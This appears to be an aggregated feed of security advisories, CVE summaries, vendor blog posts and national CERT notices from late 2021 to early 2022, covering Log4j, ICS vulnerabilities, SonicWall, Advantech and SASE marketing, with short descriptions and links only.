Improper copy algorithm and component validation in the project upload mechanism in B&R Automation Studio version 4.0 and later may allow an unauthenticated attacker to execute code. If the PLC has not been sufficiently secured, an attacker could manipulate the stored project information. Alternatively, a remote attacker may use spoofing techniques to make B&R Automation Studio connect to an attacker-controlled device with manipulated project files. When using project upload in B&R Automation Studio, such crafted projects will be loaded and opened in the security context of Automation Studio. This may result in remote code execution, information disclosure and denial of service of the system running B&R Automation Studio. Read Team82’s report: “Evil PLC Attack: Using a Controller as Predator Rather than Prey”

https://claroty.com/team82/disclosure-dashboard/cve-2021-22289
Need to prioritize security bug patches? Don't forget to scan Twitter as well as use CVSS scores
2022-01-19T21:22:00Z | 1642627320

Organizations looking to minimize exposure to exploitable software should scan Twitter for mentions of security bugs as well as use the Common Vulnerability Scoring System or CVSS, Kenna Security argues.

https://www.theregister.com/2022/01/19/twitter_cvss_vulnerabilites/
We Need to Encrypt DNS: Here?s Another Compelling Reason Why
2022-01-19T14:00:00Z | 1642600800

Encrypting DNS servers is a necessary next step in web security to prevent sensitive materials from being breached, thus improving user privacy and security.

https://www.akamai.com/blog/security/we-need-to-encrypt-dns-heres-another-compelling-reason-why
C your data structures with rellic-headergen
2022-01-19T12:00:12Z | 1642593612

Have you ever wondered how a compiler sees your data structures? Compiler Explorer may help you understand the relation between the source code and machine code, but it doesn’t provide as much support when it comes to the layout of your data. You might have heard about padding, alignment, and “plain old […]

https://blog.trailofbits.com/2022/01/19/c-your-data-structures-with-rellic-headergen/
Security Alert (A22-01-12): Multiple Vulnerabilities in Oracle Java and Oracle Products (January 2022)
2022-01-19T04:00:00Z | 1642564800

Oracle has released the Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2022-20685
2022-01-19T00:00:00Z | 1642550400

CWE-190: INTEGER OVERFLOW OR WRAPAROUND: A vulnerability in the Modbus preprocessor of the Snort detection engine could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to an integer overflow while processing Modbus traffic. An attacker could exploit this vulnerability by sending crafted Modbus traffic through an affected device. A successful exploit could allow the attacker to cause the Snort process to hang, causing traffic inspection to stop. Read more: "Blinding Snort: Breaking the MODBUS OT Preprocessor"

https://claroty.com/team82/disclosure-dashboard/cve-2022-20685
Mirai Botnet Abusing Log4j Vulnerability
2022-01-18T14:00:00Z | 1642514400

Threat Researcher Larry Cashdollar has discovered evidence of the Mirai botnet abusing Log4j vulnerability and shares code examples.

https://www.akamai.com/blog/security/mirai-botnet-abusing-log4j-vulnerability
Channel Partners Favor Scale and Deliverability Over Product Margins, Finds Cato Survey
2022-01-18T08:26:57Z | 1642494417

Our recent survey  Security or Performance: How do you Prioritize? has a lot to say about what enterprise IT leaders value vis-à-vis the tradeoffs between network performance and security effectiveness. But as a channel guy, what I found particularly interesting were the insights the survey offered about the channel. Along with the 2045 IT leaders, the... The post Channel Partners Favor Scale and Deliverability Over Product Margins, Finds Cato Survey appeared first on Cato Networks.

https://www.catonetworks.com/blog/channel-partners-favor-scale-and-deliverability-over-product-margins-finds-cato-survey/
Security or Performance
2022-01-18T08:12:13Z | 1642493533

Survey Reveals Confusion about the Promise of SASE Prioritizing between network security and network performance is hardly a strategy. Yet, Cato’s recent industry survey with non-Cato customers, Security or Performance: How do you Prioritize?, shows that de facto 2045 respondents (split evenly between security and network roles), need to – or believe they’ll have to... The post Security or Performance appeared first on Cato Networks.

https://www.catonetworks.com/blog/security-or-performance/
Advantech DeviceOn/iEdge Server 1.0.2 privilege escalation vulnerability
2022-01-18T00:00:00Z | 1642464000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1400
Advantech WISE-PaaS/OTA 3.0.9 Server installation privilege escalation vulnerability
2022-01-18T00:00:00Z | 1642464000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1409
Advantech DeviceOn/iService 1.1.7 Server installation privilege escalation vulnerability
2022-01-18T00:00:00Z | 1642464000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1408
Advantech SQ Manager Server 1.0.6 privilege escalation vulnerability
2022-01-18T00:00:00Z | 1642464000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1399
Olukord küberruumis – detsember 2021
2022-01-17T07:00:00Z | 1642402800

Detsembris registreerisime 343 mõjuga intsidenti. Keskmisest palju kõrgem näitaja tuli tänu avastatud kompromiteeritud Eesti veebilehtedele.

https://ria.ee/uudised/olukord-kuberruumis-detsember-2021
Legacy VPN Solutions Pose Risk to Productivity and Security
2022-01-13T14:54:01Z | 1642085641

The post Legacy VPN Solutions Pose Risk to Productivity and Security appeared first on Cato Networks.

https://www.catonetworks.com/resources/poor-vpn-scalability-hurts-productivity-and-security/
A Log4j Retrospective Part 4: 5 Lessons Learned from Log4j
2022-01-13T14:00:00Z | 1642082400

Read about strategies to help protect against new and more impactful security threats and vulnerabilities in Log4j from Akamai CTO Charlie Gero.

https://www.akamai.com/blog/security/a-log4j-retrospective-part-4-5-lessons-learned-from-log4j
Security Alert (A22-01-10): Vulnerability in Apple iOS and iPadOS
2022-01-13T04:00:00Z | 1642046400

Apple has released iOS 15.2.1 and iPadOS 15.2.1 to fix the vulnerability in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-01-11): Multiple Vulnerabilities in Cisco Products
2022-01-13T04:00:00Z | 1642046400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
NCSC joins US partners to promote understanding and mitigation of Russian state-sponsored cyber threats
2022-01-12T15:39:41Z | 1642001981

The NCSC supports CISA, FBI, and NSA advice in understanding and countering Russian cyber threats.

https://www.ncsc.gov.uk/news/ncsc-us-partners-promote-understanding-mitigation-russian-state-sponsored-cyber-threats
A Log4j Retrospective Part 3: Evolution ? Payloads and Attack Diversification
2022-01-12T14:00:00Z | 1641996000

https://www.akamai.com/blog/security/a-log4j-retrospective-part-3-evolution-payloads-and-attack-diversification
High Threat Security Alert (A22-01-07): Multiple Vulnerabilities in Microsoft Products (January 2022)
2022-01-12T04:00:00Z | 1641960000

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-01-08): Multiple Vulnerabilities in Firefox
2022-01-12T04:00:00Z | 1641960000

Mozilla has published the advisories (MFSA2022-01 and MFSA2022-02) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-01-09): Multiple Vulnerabilities in Adobe Reader/Acrobat
2022-01-12T04:00:00Z | 1641960000

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Discover and Announce: A Serverless Location Application Built on Akamai IoT Edge Connect
2022-01-11T14:00:00Z | 1641909600

Learn about Discover and Announce, a 100% serverless application built on Akamai IoT Edge Connect, which can run entirely on the Akamai edge.

https://www.akamai.com/blog/edge/discover-and-announce-a-serverless-location-application-built-on-akamai-Iot-edge-connect
New Gartner Report Explores The Portfolio or Platform Question for SASE Solutions
2022-01-11T12:38:54Z | 1641904734

Understanding SASE is tricky because it has no “new cool feature.” Rather, SASE is an architectural shift that fundamentally changes how common networking and security capabilities are delivered to users, locations, and applications globally. It is, primarily, a promise for a simple, agile, and holistic way of delivering secure and optimized access to everyone, everywhere,... The post New Gartner Report Explores The Portfolio or Platform Question for SASE Solutions appeared first on Cato Networks.

https://www.catonetworks.com/blog/new-gartner-report-explores-the-portfolio-or-platform-question-for-sase-solutions/
Finding unhandled errors using CodeQL
2022-01-11T12:00:58Z | 1641902458

One of your developers finds a bug in your codebase—an unhandled error code—and wonders whether there could be more. He combs through the code and finds unhandled error after unhandled error. One lone developer playing whack-a-mole. It’s not enough. And your undisciplined team of first-year Stanford grads never learned software engineering. You’re […]

https://blog.trailofbits.com/2022/01/11/finding-unhandled-errors-using-codeql/
Adobe Acrobat Reader Javascript event.richValue use-after-free vulnerability
2022-01-11T00:00:00Z | 1641859200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1387
Adobe Acrobat Reader DC annotation gestures integer overflow vulnerability
2022-01-11T00:00:00Z | 1641859200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1410
A Log4j Retrospective Part 2: Data Exfiltration and Remote Code Execution Exploits
2022-01-10T10:00:00Z | 1641808800

Akamai CTO Charlie Gero shows how the Log4j threat surface could extend to unpatchable embedded and IoT devices.

https://www.akamai.com/blog/security/a-log4j-retrospective-part-2-data-exfiltration-and-remote-code-execution-exploits
Ole oma riigiga kontaktis!
2022-01-10T07:00:00Z | 1641798000

Täna, 10. jaanuaril algab Riigi Infosüsteemi Ameti (RIA) eestvedamisel teavituskampaania, mille eesmärk on tutvustada riigiportaali www.eesti.ee keskkonda ning selle võimalusi.

https://ria.ee/uudised/ole-oma-riigiga-kontaktis
High Threat Security Alert (A22-01-06): Vulnerability in H2 Database Console
2022-01-10T04:00:00Z | 1641787200

H2 has released a security advisory to address a vulnerability in H2 database console. Reports indicate a remote code execution vulnerability in H2 database console is at high risk of exploitation.

https://www.govcert.gov.hk/en/alerts_detail.php
AnyCubic Chitubox AnyCubic Plugin readDatHeadVec heap-based buffer overflow vulnerability
2022-01-10T00:00:00Z | 1641772800

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1376
Google Chrome WebRTC RTPSenderVideoFrameTransformerDelegate memory corruption vulnerability
2022-01-10T00:00:00Z | 1641772800

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1372
Cato Demo: From Legacy to SASE in under 2 minutes with Cato sockets
2022-01-09T09:56:02Z | 1641722162

The post Cato Demo: From Legacy to SASE in under 2 minutes with Cato sockets appeared first on Cato Networks.

https://www.catonetworks.com/resources/socket-short-demo/
Secure Your Kubernetes Clusters to Stop Ransomware
2022-01-07T14:00:00Z | 1641564000

While containers offer speed and flexibility that have not been possible before in the data center, they are also exposed to security threats such as ransomware, cryptomining, and botnets.

https://www.akamai.com/blog/security/secure-your-kubernetes-clusters-to-stop-ransomware
A Log4j Retrospective Part 1: Vulnerability Background
2022-01-07T14:00:00Z | 1641564000

Learn about the widely used Java-based logging library Log4j and how its vulnerability and other capabilities presented a major opportunity to attackers.

https://www.akamai.com/blog/security/a-log4j-retrospective
Abuse and Fraud Prevention's Co-Created Future ? Predictions for 2022 and Beyond
2022-01-07T14:00:00Z | 1641564000

Explore some of the Akamai Abuse and Fraud Prevention team?s predictions for the future of abuse and fraud protection in 2022 and beyond.

https://www.akamai.com/blog/security/abuse-and-fraud-preventions-co-created-future-predictions-for-2022-and-beyond
Security Alert (A22-01-04): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2022-01-07T04:00:00Z | 1641528000

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-01-05): Multiple Vulnerabilities in Android
2022-01-07T04:00:00Z | 1641528000

Google has released Android Security Bulletin January 2022 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-01-03): Vulnerability in VMware Products
2022-01-06T04:00:00Z | 1641441600

VMware has published a security advisory to address a vulnerability in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Alerta para telefonemas falsos em nome da Microsoft
2022-01-06T00:00:00Z | 1641427200

Tem-se vindo a notar um aumento de telefonemas fraudulentos, em nome da empresa Microsoft, que incentivam as vítimas a instalarem programas maliciosos no seu computador, com a intenção de roubar informações e/ou cifrar o conteúdo das máquinas. Estes falsos funcionários da Microsoft podem também tentar aceder a detalhes dos cartões de crédito das vítimas, sendo que, para o efeito, induzem-nas a instalar software de acesso remoto por forma a conseguirem aceder a dados sensíveis.   Se for vítima deste tipo de ataque, não deve dar resposta e, muito menos, fornecer qualquer tipo de dado pessoal.   Deve notificar o CERT.PT no caso de ter sido vítima desta burla. No caso de existir dano, recomenda-se a formalização de uma queixa-crime pelo lesado junto da Polícia Judiciária ou, em alternativa, efetuar a queixa online através do Portal de Queixa Eletrónica.

https://dyn.cncs.gov.pt/pt/detalhe/art/135613/alerta-para-telefonemas-falsos-em-nome-da-microsoft
SonicOS SessionID Buffer Overflow via HTTP response
2022-01-05T18:38:22Z | 1641407902

A Stack-based buffer overflow in the SonicOS SessionID HTTP response header allows a remote authenticated attacker to cause Denial of Service (DoS) and potentially results in code execution in the firewall. This vulnerability affected SonicOS Gen 6 and Gen 7 firmware versions. CVE: CVE-2021-20048 Last updated: Jan. 5, 2022, 6:38 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0028
SonicOS Content-Length HTTP Header Stack Overflow Vulnerability
2022-01-05T18:25:40Z | 1641407140

A Stack-based buffer overflow in the SonicOS HTTP Content-Length response header allows a remote authenticated attacker to cause Denial of Service (DoS) and potentially results in code execution in the firewall. This vulnerability affected SonicOS Gen 6 and Gen 7 firmware versions. CVE: CVE-2021-20046 Last updated: Jan. 5, 2022, 6:25 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0027
The Futuriom Cloud Secure Edge and SASE Trend Report
2022-01-05T15:37:32Z | 1641397052

The post The Futuriom Cloud Secure Edge and SASE Trend Report appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-futuriom-cloud-secure-edge-and-sase-trend-report/
What Others Won’t Tell You About MPLS
2022-01-05T13:19:54Z | 1641388794

The post What Others Won’t Tell You About MPLS appeared first on Cato Networks.

https://www.catonetworks.com/resources/what-telcos-wont-tell-you-about-mpls/
Toward a Best-of-Both-Worlds Binary Disassembler
2022-01-05T12:00:51Z | 1641384051

This past winter, I was fortunate to have the opportunity to work for Trail of Bits as a graduate student intern under the supervision of Peter Goodman and Artem Dinaburg. During my internship, I developed Dr. Disassembler, a Datalog-driven framework for transparent and mutable binary disassembly. Though this project is ongoing, this […]

https://blog.trailofbits.com/2022/01/05/toward-a-best-of-both-worlds-binary-disassembler/
The Great Christmas Download
2022-01-05T10:00:00Z | 1641376800

Video game downloads and console updates helped game industry traffic peak at 125% above average on Christmas day according to Akamai, which supports more than 225 game publishers globally.

https://www.akamai.com/blog/trends/the-great-christmas-download
Security Alert (A22-01-01): Multiple Vulnerabilities in Google Chrome
2022-01-05T04:00:00Z | 1641355200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-01-02): Vulnerability in Apache Struts
2022-01-05T04:00:00Z | 1641355200

Apache has released a security update to address a vulnerability in Apache Struts.

https://www.govcert.gov.hk/en/alerts_detail.php
Automation SIG: A New SIG Adventure
2022-01-05T00:00:00Z | 1641340800

Every incident response team globally is facing a serious increase of workload. As attackers scan and penetrate networks via automation, so must defenders look at automation.

https://www.first.org/blog/20220105-Automation_SIG_A_New_SIG_Adventure
Automation SIG: A New SIG Adventure
2022-01-05T00:00:00Z | 1641340800

Every incident response team globally is facing a serious increase of workload. As attackers scan and penetrate networks via automation, so must defenders look at automation.

https://www.first.org/blog/20220105-Automation_SIG_A_New_SIG_Adventure
3. jaanuaril muutuvad RIA kasutajatoe ja riigivõrgu rikete telefoninumbrid
2022-01-03T17:10:07Z | 1641229807

3. jaanuarist 2022 saavad RIA teenuste kasutajad abi helistades numbril 666 8888 ning riigivõrgu riketest saab teatada ööpäev läbi telefonil 663 0299.

https://ria.ee/uudised/3-jaanuaril-muutuvad-ria-kasutajatoe-ja-riigivorgu-rikete-telefoninumbrid
FluBot strikes again – Android malware resurfaces in November storms
2022-01-03T09:45:25Z | 1641203125

Winter storm clouds loomed on the horizon when the FluBot malware reappeared in Finnish text messages. Vulnerabilities are discovered increasingly quickly, and it is important to ensure that home routers are secure. Criminals perpetrating scams and phishing banking details also continued to cause trouble in Finland.

https://www.kyberturvallisuuskeskus.fi/en/news/flubot-strikes-again-android-malware-resurfaces-november-storms
FluBot strikes again – Android malware resurfaces in November storms
2022-01-03T09:45:25Z | 1641203125

Winter storm clouds loomed on the horizon when the FluBot malware reappeared in Finnish text messages. Vulnerabilities are discovered increasingly quickly, and it is important to ensure that home routers are secure. Criminals perpetrating scams and phishing banking details also continued to cause trouble in Finland.

https://www.kyberturvallisuuskeskus.fi/en/news/flubot-strikes-again-android-malware-resurfaces-november-storms
Four tips for a successful cyber exercise
2022-01-03T09:06:52Z | 1641200812

The year 2021 was a busy one for our cyber exercise team. We listed our best advice to help you make your cyber exercises more useful and successful in 2022.

https://www.kyberturvallisuuskeskus.fi/en/news/four-tips-successful-cyber-exercise
Four tips for a successful cyber exercise
2022-01-03T09:06:52Z | 1641200812

The year 2021 was a busy one for our cyber exercise team. We listed our best advice to help you make your cyber exercises more useful and successful in 2022.

https://www.kyberturvallisuuskeskus.fi/en/news/four-tips-successful-cyber-exercise
What is Network-as-a-Service and Why WAN Transformation Needs NaaS and SASE
2022-01-02T13:48:54Z | 1641131334

The networking industry loves a good buzzword as much as any other IT sector. Network-as-a-Service (NaaS) certainly fits that billing. The term has been around for at least a decade has come back in vogue to describe networking purchased on a subscription basis. But what’s particularly interesting for anyone moving away from a global MPLS... The post What is Network-as-a-Service and Why WAN Transformation Needs NaaS and SASE appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-is-network-as-a-service-and-why-wan-transformation-needs-naas-and-sase/
Celebrating our 2021 Open Source Contributions
2021-12-31T12:00:56Z | 1640952056

At Trail of Bits, we pride ourselves on making our best tools open source, such as algo, manticore, and graphtage. But while this post is about open source, it’s not about our tools… In 2021, Trail of Bits employees submitted over 190 pull requests (PRs) that were merged into non-Trail of Bits repositories. This demonstrates […]

https://blog.trailofbits.com/2021/12/31/celebrating-our-2021-open-source-contributions/
Nõusolekuteenus võimaldab ettevõttel riigilt sinu andmeid küsida
2021-12-30T10:55:27Z | 1640861727

Nõusolekuteenus on Riigi Infosüsteemi Ameti arendatav e-teenus, mis võimaldab inimesel anda riigile loa jagada tema isikuandmeid kindla teenusepakkujaga. Aasta lõpus hakkas esimene teenus finantsmaailmas nõusolekuteenust ka reaalselt kasutama.

https://ria.ee/uudised/nousolekuteenus-voimaldab-ettevottel-riigilt-sinu-andmeid-kusida
Publicado esquema de certificação para o Quadro Nacional de Referência para a Cibersegurança
2021-12-30T00:00:00Z | 1640822400

Encontra-se em fase de desenvolvimento, pelo Centro Nacional de Cibersegurança, um Esquema de Certificação para o Quadro Nacional de Referência para a Cibersegurança (EC QNRCS). Com este esquema procura-se atestar a implementação em organizações candidatas das medidas estabelecidas no QNRCS para identificação, proteção, deteção, resposta e recuperação contra as ameaças à segurança da informação, bem como das redes e sistemas de informação.Neste contexto, o CNCS acaba de publicar o projeto de EC QNRCS, a que acresce um conjunto de documentos, visando a recolha de comentários e sugestões de modo a serem apreciados no âmbito da definição de uma versão final.Para quem esteja interessado em participar neste processo, enviando contributos, deverá consultar a página relativa a esta matéria, que poderá ser encontrada aqui.Informa-se que os contributos podem ser enviados por correio eletrónico para o endereço: drsc@cncs.gov.pt, preferencialmente até dia 14 de janeiro de 2022.

https://dyn.cncs.gov.pt/pt/detalhe/art/135612/publicado-esquema-de-certificacao-para-o-quadro-nacional-de-referencia-para-a-ciberseguranca
A 3ª edição do Relatório Sociedade, do Observatório de Cibersegurança, foi publicada
2021-12-30T00:00:00Z | 1640822400

O Relatório sobre a componente Sociedade, do Observatório de Cibersegurança do CNCS, apresenta os mais recentes indicadores sobre as atitudes, os comportamentos, a sensibilização e a educação na área da cibersegurança em Portugal. Este ano, além destes aspetos, este estudo faz também um acompanhamento de alguns indicadores relacionados com a Estratégia Nacional de Segurança do Ciberespaço 2019-2023, desenvolve um capítulo sobre os usos do digital em geral e a correspondente exposição ao risco, aprofunda o inquérito às organizações que fazem ações de sensibilização a públicos externos e apresenta algumas recomendações considerando os pontos mais frágeis identificados ao longo da análise realizada. Consulte o documento completo aqui.Para a versão “O Relatório em 15m”, clique aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135611/a-3-edicao-do-relatorio-sociedade-do-observatorio-de-ciberseguranca-foi-publicada
High Threat Security Alert (A21-12-13): Vulnerability in Apache Log4j
2021-12-29T04:00:00Z | 1640750400

Apache Software Foundation has released a security advisory to address a vulnerability in Apache Log4j.

https://www.govcert.gov.hk/en/alerts_detail.php
Keeping Up with the Botnets
2021-12-28T14:00:06Z | 1640700006

It?s no secret that the global pandemic increased opportunities for threat actors and cybercriminals to target financial services. Throughout 2020, scammers used the economic tension caused by COVID-19 ? the promise of financial assistance, the stress of financial hardship ? to target people across the globe via phishing attacks.

https://www.akamai.com/blog/trends/keeping-up-with-the-botnets
Publicado Boletim n.º5/2021 do Observatório de Cibersegurança
2021-12-28T00:00:00Z | 1640649600

O Boletim n.º 5/2021 tem como tema central a “palavra-passe”, abordando as suas fragilidades, os esforços para a mitigação das mesmas, os tipos de incidentes mais diretamente correlacionados e o futuro que se pode esperar para este instrumento de segurança.Como sempre, o Boletim traz também algumas notícias e publicações que procuram divulgar conteúdos relevantes para a área da cibersegurança.Consulte o documento aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135610/publicado-boletim-n52021-do-observatorio-de-ciberseguranca
Our Journey to Detect Log4j-Vulnerable Machines
2021-12-27T19:30:00Z | 1640633400

Log4Shell (CVE-2021-44228) is a remote code execution (RCE) vulnerability in the Apache-foundation open-source logging library Log4j. It was published on December 9, 2021, and then all hell broke loose. As Log4j is a common logging library for Java applications, it is highly widespread.

https://www.akamai.com/blog/security/our-journey-to-detect-log4j-vulnerable-machines
The Everyday Impacts of Diversity and Inclusion at Akamai
2021-12-23T20:30:00Z | 1640291400

To me, Diversity & Inclusion means a new way of thinking and engaging with society. It seems to be one of the most popular phrases that every person sees on the internet every day. I have been appointed as an ambassador of D&I for Akamai?s Asia-Pacific Japan region, and have been learning the essential principles along with some of my colleagues for the past several months.

https://www.akamai.com/blog/culture/the-everyday-impacts-of-diversity-and-inclusion-at-akamai
[Ep.6] Ask-Me-Anything about SASE
2021-12-23T12:23:35Z | 1640262215

The post [Ep.6] Ask-Me-Anything about SASE appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-103
[Ep.5] What to look for in a SASE Provider: Making the Right Choice
2021-12-23T12:19:07Z | 1640261947

The post [Ep.5] What to look for in a SASE Provider: Making the Right Choice appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-102
[Ep.4] The Future of Security: Do All Roads Lead to SASE?
2021-12-23T12:15:49Z | 1640261749

The post [Ep.4] The Future of Security: Do All Roads Lead to SASE? appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-101
New Cato Management Application [30 min Walkthrough]
2021-12-23T11:02:22Z | 1640257342

The post New Cato Management Application [30 min Walkthrough] appeared first on Cato Networks.

https://www.catonetworks.com/resources/management-application-walkthrough/
Security Alert (A21-12-12) Vulnerability in Apache Struts
2021-12-23T04:00:00Z | 1640232000

Apache has released a security update to address a vulnerability in Apache Struts.

https://www.govcert.gov.hk/en/alerts_detail.php
Vulnerability in Apache Log4j patch version 2.15
2021-12-22T16:02:00Z | 1640188920

Today, a Denial-of-Service (DoS) vulnerability (CVE-2021-45046) was found in the Log4j patch version 2.15. The (remote) code execution vulnerability, which the National Cyber Security Centre (NCSC) discussed in its security advisory NCSC-2021-1052 (in Dutch), has been resolved in both version 2.15 and version 2.16 of Log4j, according to Apache. The NCSC has no information that would cast doubt on this assertion.

https://english.ncsc.nl/latest/news/2021/12/15/vulnerability-in-apache-log4j-patch-version-2.15
UPDATE: Install updates to address serious vulnerability in Apache Log4j
2021-12-22T15:57:00Z | 1640188620

A serious vulnerability has been identified in Apache Log4j, a program that is commonly used in Web applications and many other systems. The National Cyber Security Centre (NCSC) has warned of potentially major damage and is advising organisations to install the updates that Apache has made available as soon as possible. We are seeing scanning activity in the Netherlands, and we anticipate that the vulnerability, which has been dubbed ‘Log4shell’, will be exploited in the near future. The NCSC is monitoring the situation closely; keep an eye on the website for further information and updates. If you are uncertain whether your organisation uses Apache Log4j, ask your software supplier.

https://english.ncsc.nl/latest/news/2021/12/11/update-install-updates-to-address-serious-vulnerability-in-apache-log4j
Why I?m Proud to Protect Billions of People Worldwide
2021-12-22T10:00:51Z | 1640167251

I decided to pursue a career in IT after working as a support engineer for internal employees as part of my very first job. It immediately opened my eyes to something that I found as interesting as I did shocking: Lots of people don?t understand information security ? and what?s more, they don?t protect their personal data.

https://www.akamai.com/blog/culture/why-im-proud-to-protect-billions-of-people-worldwide
JMSAppender - Log4j 1.2 Vulnerability CVE-2021-4104
2021-12-21T21:55:34Z | 1640123734

JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. This table will cover the Apache Log4j 1.2 vulnerability impacting the SonicWall products. SonicWall Product (Appliance/Cloud/Virtual/OnPrem) Status Description Analyzer Not Impacted  Vulnerable Component "JMSAppender" of log4j version 1.x is not used. Analytics Not Impacted  Vulnerable Component "JMSAppender" of log4j version 1.x is not used. GMS Not Impacted  Vulnerable Component "JMSAppender" of log4j version 1.x is not used. CSCMA Not Impacted  Vulnerable Component "JMSAppender" of log4j version 1.x is not used. EPRS Not Impacted  Vulnerable Component "JMSAppender" of log4j version 1.x is not used. Cloud Edge Not Impacted  Vulnerable Component "JMSAppender" of log4j version 1.x is not used. NSM - NSM SaaS           - NSM On-Premise Not Impacted  Vulnerable Component "JMSAppender" of log4j version 1.x is not used. SMA 1000 - SMA 6200/7200/6210/7210 - SMA 8200v (ESX, KVM, Hyper-V, AWS, Azure)- SRA EX 7000 Not Impacted Vulnerable Component "JMSAppender" of log4j version 1.x is not used. WXA - WXA 2000/4000 - Virtual: WXA 5000 - Software: WXA 500, WXA 6000 Not Impacted Vulnerable Component "JMSAppender" of log4j version 1.x is not used. WAF Not Impacted WAF 2.x and earlier versions do not use Log4j and are not impacted. WAF3.x is not using Log4j 1.x and is not impacted. Email Security - Hosted Email Security (HES) - On-Premise Email Security  Not Applicable Log4j 1.x not used in the Email Security. Gen5 Firewalls (EOS) - TZ100/W - TZ200/W - TZ210/W - NSA 220/W - NSA 250M/250M-W - NSA 2400/MX/3500/4500/5500 - NSA E5500/6500/6500/8500/8510 Not Applicable Log4j not used in the Gen5 appliances. Gen6 Firewalls - TZ300/W; TZ350/W - TZ400/W - TZ500/W - TZ600 - NSA 2600/2650/3600/3650/4600 /4650/5600/5650/6600/6650 - SM 9200/9400/9600/9800 - NSa 9250/9450/9650 - NSSP 12400/12800 - NSV 10/25/50/100/200/400/800/1600 (ESX, KVM, HYPER-V, AWS, Azure) Not Applicable Log4j not used in the Gen6 appliances. Gen7 Firewalls - TZ270/W - TZ370/W - TZ470/W - TZ570/W - TZ670 - NSA 2700/3700/4700/5700/6700 - NSSP 10700/11700/13700/15700 - NSV 270/470/870 (ESX, KVM, HYPER-V, AWS, Azure) Not Applicable Log4j not used in the Gen7 appliances. SonicWall Switch - SWS 12-8/12-8POE - SWS 12-10FPOE - SWS 14-24/14-24FPOE - SWS 14-48/14-48FPOE Not Applicable Log4j not used in the SonicWall Switch. SMA 100 - SMA 200/210/400/410 - SMA 500v (ESX, KVM, Hyper-V, AWS, Azure) Not Applicable Log4j not used in the SMA100 appliances. MSW  Not Applicable Log4j not used in the Mysonicwall service. Capture Client & Capture Client Portal Not Applicable Log4j not used in the Capture Client. CAS Not Applicable Log4j not used in the CAS. Access Points  Not Applicable Log4j not used in the SonicWall Access Points. WNM Not Applicable Log4j not used in the WNM. Capture Security Appliance  Not Applicable Log4j not used in the Capture Security appliance. CVE: CVE-2021-4104 Last updated: Feb. 4, 2022, 8:59 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0033
Quantifying Log4Shell: Vulnerability on a Massive Scale
2021-12-21T20:30:35Z | 1640118635

The Log4Shell vulnerability is here to stay. There is a lot of speculation about the scope and true impact of the vulnerability: While many have labeled it ?severe,? information is limited on how widespread the risk is. In order to shed some light on the issue, Akamai Threat Labs is utilizing its visibility into numerous data centers worldwide to assess the actual risk Log4Shell poses to organizations.

https://www.akamai.com/blog/security/quantifying-log4shell-vulnerability-on-a-massive-scale
How to Get Started With Application Security
2021-12-21T14:00:00Z | 1640095200

With a comprehensive security stack, Akamai?s application security solutions defend your entire ecosystem from threats. But before you can reap the benefits that come with application security, you need to create a configuration with Akamai?s APIs. Our Developer Advocacy team is here to walk you through the process so you can achieve Infrastructure as Code ? or, as we like to call it here, Akamai as Code. Akamai as Code has the ability to support all the DevSecOps practices you know and love, such as automating repetitive tasks and streamlining configurations and workflows, along with reducing manual work and errors.

https://www.akamai.com/blog/developers/how-to-get-started-with-application-security
Disclosing Shamir’s Secret Sharing vulnerabilities and announcing ZKDocs
2021-12-21T12:00:04Z | 1640088004

Trail of Bits is publicly disclosing two bugs that affect Shamir’s Secret Sharing implementation of Binance’s threshold signature scheme library (tss-lib) and most of its active forks. Here is the full list of affected repositories: Binance’s tss-lib Clover Network’s threshold-crypto Keep Network’s keep-ecdsa Swingby’s tss-lib THORchain’s tss-lib ZenGo X’s […]

https://blog.trailofbits.com/2021/12/21/disclosing-shamirs-secret-sharing-vulnerabilities-and-announcing-zkdocs/
SMA100 Improper Access Control Vulnerability allowed restricted management APIs accessible
2021-12-21T11:36:08Z | 1640086568

An Improper Access Control Vulnerability in the SMA100 series leads to multiple restricted management APIs being accessible without a user login, potentially exposing configuration meta-data.IMPORTANT: There is no evidence that these vulnerabilities are being exploited in the wild. CVE: CVE-2021-20050 Last updated: Dec. 21, 2021, 11:36 a.m.

